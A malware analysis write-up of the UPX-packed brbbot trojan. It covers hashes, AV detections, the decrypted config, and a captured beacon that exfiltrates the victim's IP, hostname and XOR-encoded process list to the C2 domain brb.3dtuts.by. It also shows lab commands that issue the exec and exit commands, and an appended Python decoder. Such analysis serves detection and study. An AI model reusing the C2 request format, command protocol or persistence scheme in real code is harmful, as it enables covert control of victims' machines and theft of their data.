72922cab21d75a9e2da351bda35bdd9f

From aldeid

Description

Summary

  • The malware is packed with UPX
  • It accepts commands from the attacker, passed through HTTP requests
  • The malware exfiltrates the IP address (i parameter), the hostname (c parameter) and the list of running processes (p parameter, as an encrypted string)
  • It creates the brbbot persistence registry value under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • It uses an XOR-crypted (key: 5b) configuration file (brbconfig.tmp) that contains the list of commands, the XOR key and the sleep time (the malware attempts to connect every 30 seconds)
  • The malware connects to brb.3dtuts.by/ads.php (HTTP)

Packer

The section analysis shows that two sections are named after UPX:

Name       VirtAddr     VirtSize     RawSize      Entropy     
--------------------------------------------------------------------------------
UPX0       0x1000       0x6000       0x0          0.000000    [SUSPICIOUS]
UPX1       0x7000       0x3000       0x2400       7.690743    [SUSPICIOUS]
.rsrc      0xa000       0x1000       0x400        2.149480    

PEiD indicates that the malware is packed with UPX:

The malware is packed with UPX. To unpack it, simply issue:

$ upx -d brbbot.exe -o brbbot-unpacked.exe
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.09        Markus Oberhumer, Laszlo Molnar & John Reiser   Feb 18th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     18944 <-     11264   59.46%    win32/pe     brbbot-unpacked.exe

Unpacked 1 file.

Identification

Packed Unpacked
MD5 72922cab21d75a9e2da351bda35bdd9f a0d53f1fa1e22b5c74089432bab4494d
SHA1 4000047c2e6065ec8aa08370cec7df1da4e9bf6d db6f12a63c1e7b65f040c86013de63fab1ccd2d3
SHA256 0531af652bb42b26f2473ef9472378b4145d2147031a18bb0e243a8f6febb6a5 c0617b2b37cf5e7bea96b8a1ded724c825898c7cdac35742676d01b7921d6727
ssdeep 192:+aKvC0lTUO6hab8kfobhAv/eF6dujaNIkipYaqtbMTz:LClIl0bbobh4/U61ubqtQH 192:+73aYKb1sXCTy0zTHzMLiREr0aPdQNbomE2Ez8+1I+p6TdpobxlnnaexxqnUdCF:oOy0zT24aPIboBjLs2HaeTdCFjO
imphash 7524196cc2153be544d1a0ebb10ef7e3 87c70a2e7a7535e011e6d5e6412ce6e5
File size 11.0 KB ( 11264 bytes ) 18.5 KB ( 18944 bytes )
File type Win32 EXE Win32 EXE
Magic literal PE32 executable for MS Windows (GUI) Intel 80386 32-bit PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Antivirus detection

Antivirus Detection (packed) Detection (unpacked) Update
AVG Win32/DH{IANnDwo} Win32/DH{IANnDwo} 20140219
Ad-Aware DeepScan:Generic.Malware.SFdld!.26C47596 Gen:Trojan.Heur.RP.bqW@aWfSY4hi 20140219
AhnLab-V3 Downloader/Win32.Spnr 20140219
AntiVir TR/Sisron.A.2120 HEUR/Malware 20140219
Avast Win32:Trojan-gen Win32:Malware-gen 20140219
BitDefender DeepScan:Generic.Malware.SFdld!.26C47596 Gen:Trojan.Heur.RP.bqW@aWfSY4hi 20140219
Commtouch W32/Trojan-Dlr-SysWrt-based!Max W32/GenBl.A0D53F1F!Olympus 20140219
Comodo UnclassifiedMalware UnclassifiedMalware 20140219
DrWeb DLOADER.Trojan DLOADER.Trojan 20140219
ESET-NOD32 probably unknown NewHeur_PE probably unknown NewHeur_PE 20140219
Emsisoft DeepScan:Generic.Malware.SFdld!.26C47596 (B) Gen:Trojan.Heur.RP.bqW@aWfSY4hi (B) 20140219
F-Prot W32/Trojan-Dlr-SysWrt-based!Max W32/Trojan-Dlr-SysWrt-based!Max 20140219
F-Secure DeepScan:Generic.Malware.SFdld!.26C47596 Gen:Trojan.Heur.RP.bqW@aWfSY4hi 20140219
Fortinet NewHeur_PE NewHeur_PE 20140219
GData DeepScan:Generic.Malware.SFdld!.26C47596 Gen:Trojan.Heur.RP.bqW@aWfSY4hi 20140219
Ikarus Win32.SuspectCrc Trojan.Win32.Spy 20140219
K7AntiVirus Virus ( 4602580b0 ) Riskware ( b70d20c90 ) 20140219
K7GW Riskware ( 0015e4f01 ) Riskware ( 0015e4f01 ) 20140219
Kingsoft Win32.Troj.Generic.a.(kcloud) Win32.Troj.Undef.(kcloud) 20140219
McAfee Artemis!72922CAB21D7 Artemis!A0D53F1FA1E2 20140219
McAfee-GW-Edition Artemis!72922CAB21D7 Artemis!A0D53F1FA1E2 20140219
MicroWorld-eScan DeepScan:Generic.Malware.SFdld!.26C47596 Gen:Trojan.Heur.RP.bqW@aWfSY4hi 20140219
Microsoft Trojan:Win32/Sisron 20140219
NANO-Antivirus Trojan.Win32.Heuristic119!.bcyvqd Trojan.Win32.Heuristic119!.bcyvqd 20140219
Norman Horst.gen32 Troj_Generic.FFROT 20140219
Panda Trj/CI.A Trj/CI.A 20140219
Sophos Mal/Generic-S Mal/Generic-S 20140219
Symantec Downloader Trojan.Gen 20140219
TheHacker Posible_Worm32 20140219
TrendMicro TROJ_SPNR.15L712 TROJ_SPNR.15L712 20140219
TrendMicro-HouseCall TROJ_GEN.RCBOHK9 TROJ_SPNR.15L712 20140219
VIPRE Trojan.Win32.Generic!BT Trojan.Win32.Generic!BT 20140219
Agnitum 20140219
Antiy-AVL Trojan/Win32.SGeneric 20140219
Baidu-International 20140219
Bkav 20140219
ByteHero 20140219
CAT-QuickHeal 20140213
CMC 20140219
ClamAV 20140219
Jiangmin 20140219
Kaspersky 20140219
Malwarebytes 20140219
Qihoo-360 20140218
Rising 20140219
SUPERAntiSpyware 20140218
TotalDefense 20140219
VBA32 20140219
ViRobot 20140219
nProtect 20140219

Dynamic Analysis

Network indicators

Contacted domains

The domain brb.3dtuts.by is contacted.

HTTP requests

GET /ads.php?i=192.168.102.129&c=MALWARE-418EE9F&p=123f373e600822282[SNIP]42f753e233e HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: brb.3dtuts.by
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: thttpd/2.25b 29dec2003
Content-Type: text/plain; charset=iso-8859-1
Date: Wed, 19 Feb 2014 18:01:06 GMT
Last-Modified: Sat, 01 Feb 2014 09:24:44 GMT
Accept-Ranges: bytes
Connection: close
Content-Length: 5

tixe

This request shows that the malware is attempting to exfiltrate details about the infected system, including:

Parameter Description Value
i IP address of the infected system 192.168.102.129
c Hostname of the infected system MALWARE-418EE9F
p Encoded list of running processes (see Decoding HTTP payload) 123f373e600822282[SNIP]42f753e233e

Registry keys

The following key is created:

Path HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot
Type REG_SZ
Name brbbot
Value C:\WINDOWS\system32\brbbot.exe

Files

A file is created: brbconfig.tmp (see the Decoded file section).

$ hd brbconfig.tmp 
00000000  b8 9c c3 aa df 98 67 11  66 ab fe 23 79 07 6e 17  |......g.f..#y.n.|
00000010  f3 b7 44 7c dd 2a fa 30  79 56 4c 75 a2 76 71 7d  |..D|.*.0yVLu.vq}|
00000020  72 91 3a 1a da 02 8e 81  e3 27 3c c2 36 7c c0 48  |r.:......'<.6|.H|
00000030  a0 17 ed dc 01 44 2d 95  2c 1d 12 3c 88 bf ce 2d  |.....D-.,..<...-|
00000040  6b c0 61 16 46 b5 0c 16  92                       |k.a.F....|
00000049

Issuing commands

List of commands

From the decoded file analysis (see the Decoded file section), we gathered the following possible commands:

Command Description
exec=cexe Execute a command
file=elif Upload or download a file?
conf=fnoc Update configuration file?
exit=tixe Exit the malware

We also know that the malware is gathering commands from the ads.php script every 30 seconds (sleep=30000).

cexe (exec)

As a proof of concept, I've set up a lab with PyminifakeDNS (fakedns) running and an HTTP server as follows:

root@remnux:/var/www# echo "cexe c:\windows\system32\calc.exe" > ads.php

After a short while, the infected machine opens a new instance of the Windows calculator every 30 seconds:

tixe (exit)

Now, the tixe parameter is confirmed to kill the malware on the infected machine:

root@remnux:/var/www# echo "tixe" > ads.php

Static analysis

Strings

%02x
%s?i=%s&c=%s&p=%s
brbconfig.tmp
YnJiYm90
brbbot
Software\Microsoft\Windows\CurrentVersion\Run
CONFIG
encode
sleep
exit
conf
file
exec
Microsoft Enhanced Cryptographic Provider v1.0
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Connection: close
HTTP/1.1
POST
ntdll.dll
ZwQuerySystemInformation
KERNEL32.DLL
ADVAPI32.dll
msvcrt.dll
USER32.dll
WININET.dll
WS2_32.dll
HeapAlloc
GetProcessHeap
HeapFree
GetLastError
HeapReAlloc
GetComputerNameA
CreateProcessA
SetEvent
DeleteFileA
MoveFileExA
CopyFileA
GetSystemDirectoryA
GetSystemWow64DirectoryA
GetModuleFileNameA
GetModuleHandleA
WaitForSingleObject
CreateEventA
CloseHandle
WriteFile
CreateFileA
LockResource
LoadResource
SizeofResource
FindResourceA
ReadFile
GetFileSize
GetTempFileNameA
GetTempPathA
WideCharToMultiByte
GetProcAddress
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
GetSystemTimeAsFileTime
GetCurrentProcessId
GetCurrentThreadId
GetTickCount
QueryPerformanceCounter
SetUnhandledExceptionFilter
RtlUnwind
InterlockedCompareExchange
Sleep
InterlockedExchange
RegCloseKey
RegFlushKey
RegSetValueExA
RegOpenKeyExA
RegDeleteValueA
CryptReleaseContext
CryptDestroyKey
CryptDestroyHash
CryptEncrypt
CryptDeriveKey
CryptHashData
CryptCreateHash
CryptAcquireContextA
CryptDecrypt
_amsg_exit
__setusermatherr
__p__commode
__p__fmode
__set_app_type
?terminate@@YAXXZ
_controlfp
_initterm
exit
_XcptFilter
_exit
strrchr
__getmainargs
strstr
strncat
memcpy
strchr
strncmp
strncpy
memset
sscanf
sprintf
atoi
_cexit
GetDC
HttpSendRequestA
HttpQueryInfoA
InternetOpenA
InternetSetOptionA
InternetConnectA
InternetCloseHandle
InternetQueryDataAvailable
InternetReadFile
HttpOpenRequestA

IAT

ADVAPI32

  • RegCloseKey
  • RegFlushKey
  • RegSetValueExA
  • RegOpenKeyExA
  • RegDeleteValueA
  • CryptReleaseContext
  • CryptDestroyKey
  • CryptDestroyHash
  • CryptEncrypt
  • CryptDeriveKey
  • CryptHashData
  • CryptCreateHash
  • CryptAcquireContextA
  • CryptDecrypt

KERNEL32

  • HeapAlloc
  • GetProcessHeap
  • HeapFree
  • GetLastError
  • HeapReAlloc
  • GetComputerNameA
  • CreateProcessA
  • SetEvent
  • DeleteFileA
  • MoveFileExA
  • CopyFileA
  • GetSystemDirectoryA
  • GetSystemWow64DirectoryA
  • GetModuleFileNameA
  • GetModuleHandleA
  • WaitForSingleObject
  • CreateEventA
  • CloseHandle
  • WriteFile
  • CreateFileA
  • LockResource
  • LoadResource
  • SizeofResource
  • FindResourceA
  • ReadFile
  • GetFileSize
  • GetTempFileNameA
  • GetTempPathA
  • WideCharToMultiByte
  • GetProcAddress
  • UnhandledExceptionFilter
  • GetCurrentProcess
  • TerminateProcess
  • GetSystemTimeAsFileTime
  • GetCurrentProcessId
  • GetCurrentThreadId
  • GetTickCount
  • QueryPerformanceCounter
  • SetUnhandledExceptionFilter
  • RtlUnwind
  • InterlockedCompareExchange
  • Sleep
  • InterlockedExchange

USER32

  • GetDC

WININET

  • HttpSendRequestA
  • HttpQueryInfoA
  • InternetOpenA
  • InternetSetOptionA
  • InternetConnectA
  • InternetCloseHandle
  • InternetQueryDataAvailable
  • InternetReadFile
  • HttpOpenRequestA

WS2_32

  • WSACleanup
  • gethostname
  • gethostbyname
  • inet_ntoa
  • WSAStartup

msvcrt

  • _amsg_exit
  • __setusermatherr
  • __p__commode
  • __p__fmode
  • __set_app_type
  • ?terminate@@YAXXZ
  • _controlfp
  • _initterm
  • exit
  • _XcptFilter
  • _exit
  • strrchr
  • __getmainargs
  • strstr
  • strncat
  • memcpy
  • strchr
  • strncmp
  • strncpy
  • memset
  • sscanf
  • sprintf
  • atoi
  • _cexit

Decoded file

To decode the file, let's load our unpacked malware into OllyDbg and set a breakpoint on the ReadFile function. The call on the screenshot below corresponds to the access to the brbconfig.tmp file, as shown by the Handles window:

A few instructions later, there is a call to the CryptDecrypt function:

Setting a breakpoint at this address and then stepping over reveals the following string:

uri=ads.php;exec=cexe;file=elif;conf=fnoc;exit=tixe;encode=5b;sleep=30000

This is the decrypted content of the brbconfig.tmp file. It provides the following parameters:

  • uri=ads.php
  • exec=cexe
  • file=elif
  • conf=fnoc
  • exit=tixe
  • encode=5b
  • sleep=30000

Decoding HTTP payload

From the previous decoded file analysis (see the Decoded file section), we have gathered the following information: encode=5b

We can suppose that 5b is the XOR key for the string discovered in the p parameter of the HTTP request. Let's try with translate.py:

$ cat encoded.hex
123f373e600822282[SNIP]42f753e233e
$ xxd -r -p encoded.hex > encoded.raw
$ translate.py encoded.raw decoded.txt 'byte ^ 0x5b'
$ more decoded.txt
Idle;System;smss.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;vmacthlp.exe;svchost.exe;svchost.exe;svchost.exe;svchost.exe;svchost.exe;explorer.exe;spoolsv.exe;vmtoolsd.exe;msmsgs.exe;rundll32.exe;jqs.exe;sqlservr.exe;vmtoolsd.exe;wuauclt.exe;wmiprvse.exe;TPAutoConnSvc.exe;wscntfy.exe;TPAutoConnect.exe;alg.exe;wmiprvse.exe;cmd.exe;CaptureBAT.exe

We can see from the above output that the list of running processes is disclosed.
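Putting the Decoded file and Decoding HTTP payload sections together, here is an added example (not code from the aldeid page or from the brbbot sample itself) that parses the decrypted brbconfig.tmp string, uses its encode key to recover the i, c and p fields from a beacon request shaped like the one captured above, and maps a server reply such as tixe back to its command name. The config string and the 0x5b key come from the page; the process list, IP and hostname used in the test are constructed.

```python
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Decrypted brbconfig.tmp content as recovered in the "Decoded file" section.
SAMPLE_CONFIG = "uri=ads.php;exec=cexe;file=elif;conf=fnoc;exit=tixe;encode=5b;sleep=30000"
COMMAND_KEYS = ("exec", "file", "conf", "exit")


def parse_config(cfg: str) -> dict:
    """Split 'key=value;key=value' into a dict (keys as in the sample's config)."""
    return dict(item.split("=", 1) for item in cfg.split(";") if item)


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the same transform translate.py applied above."""
    return bytes(b ^ key for b in data)


def encode_payload(text: str, key: int) -> str:
    """Mirror of the sample's '%02x' encoding: XOR each byte, then hex-encode."""
    return xor_bytes(text.encode("ascii"), key).hex()


def decode_beacon(request_line: str, cfg: dict) -> Optional[dict]:
    """Recover i, c and p from 'GET /ads.php?i=..&c=..&p=.. HTTP/1.1'.

    Returns None when the method or path does not match the configured uri,
    so the function can double as a matcher over proxy or IDS log lines.
    """
    fields = request_line.split()
    if len(fields) < 2 or fields[0] != "GET":
        return None
    parts = urlsplit(fields[1])
    if parts.path.lstrip("/") != cfg["uri"]:
        return None
    qs = parse_qs(parts.query)
    key = int(cfg["encode"], 16)  # "5b" -> 0x5b
    p_hex = qs.get("p", [""])[0]
    procs = xor_bytes(bytes.fromhex(p_hex), key).decode("ascii", "replace")
    return {
        "ip": qs.get("i", [""])[0],
        "host": qs.get("c", [""])[0],
        "processes": procs.split(";") if procs else [],
    }


def command_name(cfg: dict, reply: str) -> Optional[str]:
    """Map the first word of an ads.php reply (e.g. 'tixe') back to exec/file/conf/exit."""
    wire_to_name = {cfg[k]: k for k in COMMAND_KEYS if k in cfg}
    first = reply.strip().split(None, 1)
    return wire_to_name.get(first[0]) if first else None
```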
